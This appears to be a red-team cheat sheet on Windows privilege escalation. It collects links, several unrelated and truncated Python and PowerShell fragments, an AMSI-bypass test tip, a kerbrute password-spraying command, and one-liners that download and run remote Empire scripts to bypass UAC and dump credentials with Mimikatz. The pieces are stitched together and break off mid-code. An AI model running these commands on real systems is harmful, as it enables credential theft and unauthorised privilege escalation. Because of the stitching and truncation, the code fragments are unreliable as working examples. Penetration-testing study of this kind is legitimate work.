| title |
|---|
| Windows Privilege Escalation |
https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html
https://github.com/areyou1or0/Windows
https://git.io/JL7sx
https://github.com/C0nd4/OSCP-Priv-Esc
```python
import requests
from bs4 import BeautifulSoup
from datetime import datetime
import argparse

BASE_URL = "https://blog.badsectorlabs.com/"
START_PAGE = "index.html"

def get_posts_from_page(url):
    """Extract posts (date, title, link) from an index page."""
```
```python
import argparse
import requests

# Configure Argument Parser
parser = argparse.ArgumentParser(
    description="Retrieve an OAuth 2.0 access token using Client Credentials Flow and call Microsoft Graph API."
)
parser.add_argument("--tenant-id", required=True, help="Azure AD Tenant ID")
parser.add_argument("--client-id", required=True, help="Azure AD Application (Client) ID")
```
```python
import requests
import json
import time
import argparse
import getpass
import os
import sys

def main():
```
```powershell
function Invoke-BloodHound
{
    <#
    .SYNOPSIS
    Runs the BloodHound C# Ingestor using reflection. The assembly is stored in this file.
    .DESCRIPTION
    Using reflection and assembly.load, load the compiled BloodHound C# ingestor into memory
```
To test any of these techniques, type "Invoke-Mimikatz" into your PowerShell terminal: even if you haven't imported Mimikatz, AMSI will flag the string as malicious. If AMSI is off or has been avoided, PowerShell will only report that the term "is not recognized as the name of a cmdlet", which shows that AMSI has been bypassed.
However, some methods may be detected by the AV, but most of them actually work without problems.
The first and worst way to bypass AMSI is downgrading PowerShell to version 2.0.
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With the Rubeus version with the brute module:
```powershell
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands
```